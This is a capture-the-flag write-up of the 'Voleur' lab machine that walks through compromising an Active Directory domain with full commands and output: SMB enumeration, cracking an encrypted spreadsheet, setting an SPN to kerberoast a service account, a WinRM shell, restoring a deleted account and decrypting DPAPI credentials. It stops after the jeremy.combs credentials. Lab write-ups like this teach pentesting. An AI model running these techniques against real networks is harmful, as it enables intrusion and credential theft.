Voleur
by 0xW1LD
EnvVars
Throughout this writeup I use a variety of environment variables that I set to make it easier on myself to use the commands through my terminal’s command history.
1
2
3
4
5
6
DC=dc.voleur.htb
T=<ip address>
DOMAIN=voleur.htb
D=voleur.htb
USER=ryan.naylor
PASS=HollowOct31Nyt
Note that these can change throughout the writeup, most especially the USER and PASS variables, if it is not mentioned then it is probably the most recently gained credentials or hash.
Enumeration
As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account:
ryan.naylor/HollowOct31Nyt
Scans
As usual we start off with an nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2222/tcp open EtherNetIP-1
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
58802/tcp open unknown
58813/tcp open unknown
58828/tcp open unknown
Looks like most of the ports are standard from an Active Directory server, although we can notice the following unique port:
2222Which, after a more thorough, service and script scan, we can find that it’s runningOpenSSH Ubuntu
1
2
3
4
5
6
7
8
9
10
2222/tcp open ssh syn-ack ttl 127 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+vH6cIy1hEFJoRs8wB3O/XIIg4X5gPQ8XIFAiqJYvSE7viX8cyr2UsxRAt0kG2mfbNIYZ+80o9bpXJ/M2Nhv1VRi4jMtc+5boOttHY1CEteMGF6EF6jNIIjVb9F5QiMiNNJea1wRDQ2buXhRoI/KmNMp+EPmBGB7PKZ+hYpZa
vF0EKKTC8HEHvyYDS4CcYfR0pNwIfaxT57rSCAdcFBcOUxKWOiRBK1Rv8QBwxGBhpfFngayFj8ewOOJHaqct4OQ3JUicetvox6kG8si9r0GRigonJXm0VMi/aFvZpJwF40g7+oG2EVu/sGSR6d6t3ln5PNCgGXw95pgYR4x9fLpn/OwK6tugAjeZMla3Mybmn3dXUc5BKqVNHQCMIS
6rlIfHZiF114xVGuD9q89atGxL0uTlBOuBizTaF53Z//yBlKSfvXxW4ShH6F8iE1U8aNY92gUejGclVtFCFszYBC2FvGXivcKWsuSLMny++ZkcE4X7tUBQ+CuqYYK/5TfxmIs=
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
| 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
Which may indicate one of three things:
DockerWSLVirtual Machine
Samba Shares
Attempting to authenticate to the machine using smb and the assumed breach credentials we were given, it looks like NTLM is disabled.
1
2
3
nxc smb $DC -u $USER -p $PASS
SMB 10.129.110.234 445 10.129.110.234 [*] x64 (name:10.129.110.234) (domain:10.129.110.234) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.110.234 445 10.129.110.234 [-] 10.129.110.234\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
So instead let’s try to authenticate using Kerberos. Let’s first ensure that our clock is synced to the box.
1
2
3
sudo ntpdate $DOMAIN
2025-07-08 18:12:29.185245 (-0400) +28793.425717 +/- 0.152090 voleur.htb 10.129.110.234 s1 no-leap
CLOCK: time stepped by 28793.425717
Now let’s check smb authentication specifying the -k flag to force the usage of the Kerberos protocol.
1
2
3
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
Success! Let’s start by enumerating the following:
- Users
- Groups
- Computers
- Accessible Shares
I am using
rid-brutehere because I found that it’s more thorough, though more noisy as well as providing us with 3 of the 4 objects I want to enumerate.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k --rid-brute
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC 498: VOLEUR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 500: VOLEUR\Administrator (SidTypeUser)
SMB DC.voleur.htb 445 DC 501: VOLEUR\Guest (SidTypeUser)
SMB DC.voleur.htb 445 DC 502: VOLEUR\krbtgt (SidTypeUser)
SMB DC.voleur.htb 445 DC 512: VOLEUR\Domain Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 513: VOLEUR\Domain Users (SidTypeGroup)
SMB DC.voleur.htb 445 DC 514: VOLEUR\Domain Guests (SidTypeGroup)
SMB DC.voleur.htb 445 DC 515: VOLEUR\Domain Computers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 516: VOLEUR\Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 517: VOLEUR\Cert Publishers (SidTypeAlias)
SMB DC.voleur.htb 445 DC 518: VOLEUR\Schema Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 519: VOLEUR\Enterprise Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 520: VOLEUR\Group Policy Creator Owners (SidTypeGroup)
SMB DC.voleur.htb 445 DC 521: VOLEUR\Read-only Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 522: VOLEUR\Cloneable Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 525: VOLEUR\Protected Users (SidTypeGroup)
SMB DC.voleur.htb 445 DC 526: VOLEUR\Key Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 527: VOLEUR\Enterprise Key Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 553: VOLEUR\RAS and IAS Servers (SidTypeAlias)
SMB DC.voleur.htb 445 DC 571: VOLEUR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB DC.voleur.htb 445 DC 572: VOLEUR\Denied RODC Password Replication Group (SidTypeAlias)
SMB DC.voleur.htb 445 DC 1000: VOLEUR\DC$ (SidTypeUser)
SMB DC.voleur.htb 445 DC 1101: VOLEUR\DnsAdmins (SidTypeAlias)
SMB DC.voleur.htb 445 DC 1102: VOLEUR\DnsUpdateProxy (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1103: VOLEUR\ryan.naylor (SidTypeUser)
SMB DC.voleur.htb 445 DC 1104: VOLEUR\marie.bryant (SidTypeUser)
SMB DC.voleur.htb 445 DC 1105: VOLEUR\lacey.miller (SidTypeUser)
SMB DC.voleur.htb 445 DC 1106: VOLEUR\svc_ldap (SidTypeUser)
SMB DC.voleur.htb 445 DC 1107: VOLEUR\svc_backup (SidTypeUser)
SMB DC.voleur.htb 445 DC 1108: VOLEUR\svc_iis (SidTypeUser)
SMB DC.voleur.htb 445 DC 1109: VOLEUR\jeremy.combs (SidTypeUser)
SMB DC.voleur.htb 445 DC 1112: VOLEUR\First-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1113: VOLEUR\Second-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1114: VOLEUR\Third-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1601: VOLEUR\svc_winrm (SidTypeUser)
SMB DC.voleur.htb 445 DC 1602: VOLEUR\Restore_Users (SidTypeGroup)
I’m already seeing a couple of interesting targets, namely: the service accounts, the Restore_Users group, The multiple lines of technician groups.
Next let’s use the spider_plus module of nxc to spider the smb shares.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k -M spider_plus
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SPIDER_PLUS DC.voleur.htb 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS DC.voleur.htb 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS DC.voleur.htb 445 DC [*] STATS_FLAG: True
SPIDER_PLUS DC.voleur.htb 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS DC.voleur.htb 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS DC.voleur.htb 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS DC.voleur.htb 445 DC [*] OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share
SPIDER_PLUS DC.voleur.htb 445 DC [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/DC.voleur.htb.json".
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Shares: 8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Readable Shares: 4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS DC.voleur.htb 445 DC [*] Total folders found: 27
SPIDER_PLUS DC.voleur.htb 445 DC [*] Total files found: 7
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size average: 3.55 KB
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size min: 22 B
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size max: 16.5 KB
It looks like we have access to read the non-default share IT.
Foothold
Access to svc_ldap
Looking at the gathered metadata we can see an interesting file in the IT share named: Access Review
1
2
3
4
5
6
7
8
9
10
cat DC.voleur.htb.json
{
"IT": {
"First-Line Support/Access_Review.xlsx": {
"atime_epoch": "2025-01-31 04:09:27",
"ctime_epoch": "2025-01-29 04:39:51",
"mtime_epoch": "2025-05-29 18:23:36",
"size": "16.5 KB"
}
},
Let’s grab this file, however since NTLM isn’t supported, let’s initiate a kerberos authentication. First, let’s generate a krb5 config file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
LOWER_REALM=$DOMAIN
UPPER_REALM=$(echo "$LOWER_REALM" | tr '[:lower:]' '[:upper:]')
DC_HOSTNAME='DC'
cat '<< EOF | sed \
-e "s//$UPPER_REALM/g" \
-e "s//$LOWER_REALM/g" \
-e "s//$DC_HOSTNAME/g" > custom_krb5.conf
[libdefaults]
default_realm =
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
= {
kdc = .
admin_server = .
default_domain = .
}
[domain_realm]
=
. =
EOF'
export KRB5_CONFIG=$(pwd)/custom_krb5.conf
Next let’s start an authentication, which will grab us a ccache file.
1
2
3
4
5
6
7
8
9
kinit $USER
Password for ryan.naylor@VOLEUR.HTB:
sudo klist
Ticket cache: FILE:/ryan.naylor.ccache
Default principal: ryan.naylor@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 18:58:50 07/09/2025 04:58:50 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 18:58:47
Now let’s authenticate to smb using smbclient and grab the file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /ryan.naylor.ccache
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
First-Line Support D 0 Wed Jan 29 04:40:17 2025
5311743 blocks of size 4096. 877321 blocks available
smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
. D 0 Wed Jan 29 04:40:17 2025
.. D 0 Wed Jan 29 04:10:01 2025
Access_Review.xlsx A 16896 Thu Jan 30 09:14:25 2025
5311743 blocks of size 4096. 877321 blocks available
smb: \First-Line Support\> get Access_Review.xlsx
getting file \First-Line Support\Access_Review.xlsx of size 16896 as Access_Review.xlsx (12.8 KiloBytes/sec) (average 12.8 KiloBytes/sec)
Taking a look at the file we can see that it’s encrypted.
1
2
file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
Let’s attempt to crack this using office2john and johntheripper.
1
2
3
4
5
6
7
8
9
10
11
12
office2john Access_Review.xlsx > Access_Review.pem
john --wordlist=/usr/share/wordlists/rockyou.txt Access_Review.pem
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:10 DONE (2025-07-08 19:05) 0.09505g/s 76.04p/s 76.04c/s 76.04C/s football1..martha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let’s use this password to open up the xlsx file, within which we can find the following information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| User | Job Title | Permissions | Notes |
| -------------------- | ------------------------------ | ------------------------ | --------------------------------------------------------------------- |
| Ryan.Naylor | First-Line Support Technician | SMB | Has Kerberos Pre-Auth disabled temporarily to test legacy systems. |
| Marie.Bryant | First-Line Support Technician | SMB | |
| Lacey.Miller | Second-Line Support Technician | Remote Management Users | |
| Todd.Wolfe | Second-Line Support Technician | Remote Management Users | Leaver. Password was reset to [REDACTED] and account deleted. |
| Jeremy.Combs | Third-Line Support Technician | Remote Management Users. | Has access to Software folder. |
| Administrator | Administrator | Domain Admin | Not to be used for daily tasks! |
| | | | |
| **Service Accounts** | | | |
| svc_backup | | Windows Backup | Speak to Jeremy! |
| svc_ldap | | LDAP Services | P/W - [REDACTED] |
| svc_iis | | IIS Administration | P/W - [REDACTED] |
| svc_winrm<br> | | Remote Management | Need to ask Lacey as she reset this recently. |
Looks like we have the following credentials.
Todd.Wolfe:[REDACTED](Account Deleted, Restore Users group could come in handy)svc_ldap:[REDACTED]svc_iis:[REDACTED]
Attempting authentication, we can authenticate with both service accounts, we have successfully gotten a foothold!
User
Access to svc_winrm
Checking svc_ldap’s permissions we can find that we have ACLs to write Second-Line Support Technicians, Lacey Miller (who is a member of the Second-Line Support Technicians group), and svc_winrm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=voleur,DC=htb
permission: WRITE
distinguishedName: OU=Second-Line Support Technicians,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE
distinguishedName: CN=Lacey Miller,OU=Second-Line Support Technicians,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE
distinguishedName: CN=svc_ldap,OU=Service Accounts,DC=voleur,DC=htb
permission: WRITE
distinguishedName: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
permission: WRITE
The most obvious path I’d go for here would be to do some sort of generic write attack on svc_winrm or Lacey Miller
After attempting a few things, I was unable to do anything with Lacey Miller so instead I targeted svc_winrm. Since this is a service account, I decided to do kerberoasting. Let’s ensure that the target has a valid SPN
1
2
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k set object svc_winrm servicePrincipalName -v "voleur/w1ld"
[+] svc_winrm's servicePrincipalName has been updated
Next let’s kerberoast the account and grab the TGS.
1
2
3
4
5
6
7
nxc ldap $DC -u $USER -p $PASS -k --kerberoasting kerberoast.txt
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\svc_ldap:[REDACTED]
LDAP dc.voleur.htb 389 DC [*] Skipping disabled account: krbtgt
LDAP dc.voleur.htb 389 DC [*] Total of records returned 1
LDAP dc.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 04:10:12.398769, lastLogon: 2025-01-29 10:07:32.711487
LDAP dc.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$3cd6[REDACTED]
Now we can attempt to crack the TGS using hashcat
1
2
3
4
hashcat -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$3cd6f0dd9582e5f920e48c0cdb80b552$2738f56ab656d4bf9d1b229ead61a79df09fa4d2dbee412bc73cd031164ea2ccb2bdc3baffe21ad54f6e628630332046e53ae0ea472e5710677580fbb
[REDACTED]:[REDACTED]
Success! We’ve cracked the credentials.
svc_winrm:[REDACTED]
We’re a member of remote management users so let’s winrm.
1
2
3
4
5
6
7
8
9
10
11
12
13
kinit $USER
Password for svc_winrm@VOLEUR.HTB:
evil-winrm -i $DC -r $DOMAIN
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
Just like that, we have User!
Root
Restoring Todd.Wolfe
We recall that we saw a deleted account: Todd.Wolfe, looking around further looks like svc_ldap is part of the restore users group.
1
2
3
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get object svc_ldap
memberOf: CN=Restore_Users,DC=voleur,DC=htb
We can confirm that we have the Reanimate Tombstone permission by checking the ACLs on the DC.
1
2
3
4
5
6
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get object "DC=voleur,DC=HTB" --resolve-sd
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: Restore_Users
nTSecurityDescriptor.ACL.3.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.3.ObjectType: Reanimate-Tombstones
Looks like we have all we need, let’s attempt to restore todd.wolfe
1
2
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
You’ll need the latest version of
bloodyADto use therestorefunction, you can usepipto install it
Nice, now let’s attempt to authenticate as todd.wolfe using the credentials we found earlier. At the same time we can use the whoami module to check our group membership and other information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nxc ldap $DC -u $USER -p $PASS -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\todd.wolfe:[REDACTED]
WHOAMI dc.voleur.htb 389 DC description: Second-Line Support Technician
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Second-Line Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Todd Wolfe
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964933318134123
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133826280731790960
WHOAMI dc.voleur.htb 389 DC logonCount: 5
WHOAMI dc.voleur.htb 389 DC sAMAccountName: todd.wolfe
Accessing jeremy.combs
We can see that we’re a member of Second-Line Technicians, let’s check if we have additional access to other folders in the IT share or other shares.
1
2
3
4
5
6
7
8
9
10
echo $PASS | kinit $USER
Password for todd.wolfe@VOLEUR.HTB:
klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: todd.wolfe@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 20:17:03 07/09/2025 06:17:03 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 20:17:02
Looking around the IT share we can access a different folder called Second-Line Support where we can find an Archived Users folder containing todd.wolfe with what looks like the user’s archived home directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /tmp/krb5cc_1000
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
Second-Line Support D 0 Wed Jan 29 10:13:03 2025
5311743 blocks of size 4096. 873443 blocks available
smb: \> cd "Second-Line Support"
smb: \Second-Line Support\> ls
. D 0 Wed Jan 29 10:13:03 2025
.. D 0 Wed Jan 29 04:10:01 2025
Archived Users D 0 Wed Jan 29 10:13:06 2025
5311743 blocks of size 4096. 873443 blocks available
smb: \Second-Line Support\> cd "Archived Users"
smb: \Second-Line Support\Archived Users\> ls
. D 0 Wed Jan 29 10:13:06 2025
.. D 0 Wed Jan 29 10:13:03 2025
todd.wolfe D 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\> cd todd.wolfe
smb: \Second-Line Support\Archived Users\todd.wolfe\> ls
. D 0 Wed Jan 29 10:13:10 2025
.. D 0 Wed Jan 29 10:13:06 2025
3D Objects DR 0 Wed Jan 29 10:13:06 2025
AppData DH 0 Wed Jan 29 10:13:09 2025
Contacts DR 0 Wed Jan 29 10:13:10 2025
Desktop DR 0 Thu Jan 30 09:28:50 2025
Documents DR 0 Wed Jan 29 10:13:10 2025
Downloads DR 0 Wed Jan 29 10:13:10 2025
Favorites DR 0 Wed Jan 29 10:13:10 2025
Links DR 0 Wed Jan 29 10:13:10 2025
Music DR 0 Wed Jan 29 10:13:10 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TM.blf AHS 65536 Wed Jan 29 10:13:06 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Jan 29 07:53:07 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Jan 29 07:53:07 2025
ntuser.ini AHS 20 Wed Jan 29 07:53:07 2025
Pictures DR 0 Wed Jan 29 10:13:10 2025
Saved Games DR 0 Wed Jan 29 10:13:10 2025
Searches DR 0 Wed Jan 29 10:13:10 2025
Videos DR 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\>
Since we have access to the AppData folder let’s look around for the DPAPI files.
1
2
3
4
5
6
7
8
9
10
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
08949382-134f-4c63-b93c-ce52efc0aa88 A 740 Wed Jan 29 07:53:09 2025
BK-VOLEUR AHS 900 Wed Jan 29 07:53:09 2025
Preferred AHS 24 Wed Jan 29 07:53:09 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> get 08949382-134f-4c63-b93c-ce52efc0aa88
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 of size 740 as 08949382-134f-4c63-b93c-ce52efc0aa88 (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
We found a master key, let’s find some credentials.
1
2
3
4
5
6
7
8
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> dir
. DSn 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
772275FAD58525253490A9B0039791D3 An 398 Wed Jan 29 07:55:19 2025
5311743 blocks of size 4096. 873411 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> get 772275FAD58525253490A9B0039791D3
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3 of size 398 as 772275FAD58525253490A9B0039791D3 (0.3 KiloBytes/sec) (average 0.5 KiloBytes/sec)
Now that we have both a master-key and credential file, let’s use dpapi first to get a decrypted key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password $PASS
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Next let’s use this decrypted key on the credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : [REDACTED]
We’ve recovered another set of credentials!
jeremy.combs:[REDACTED]
Looks like this time we’re a member of Third-Line Support Technicians.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nxc ldap $DC -u $USER -p $PASS -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\jeremy.combs:[REDACTED]
WHOAMI dc.voleur.htb 389 DC description: Third-Line Support Technician
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Jeremy Combs,OU=Third-Line Support Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Third-Line Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Jeremy Combs
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964947008134262
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133826370322424800
WHOAMI dc.voleur.htb 389 DC logonCount: 3
WHOAMI dc.voleur.htb 389 DC sAMAccountName: jeremy.combs
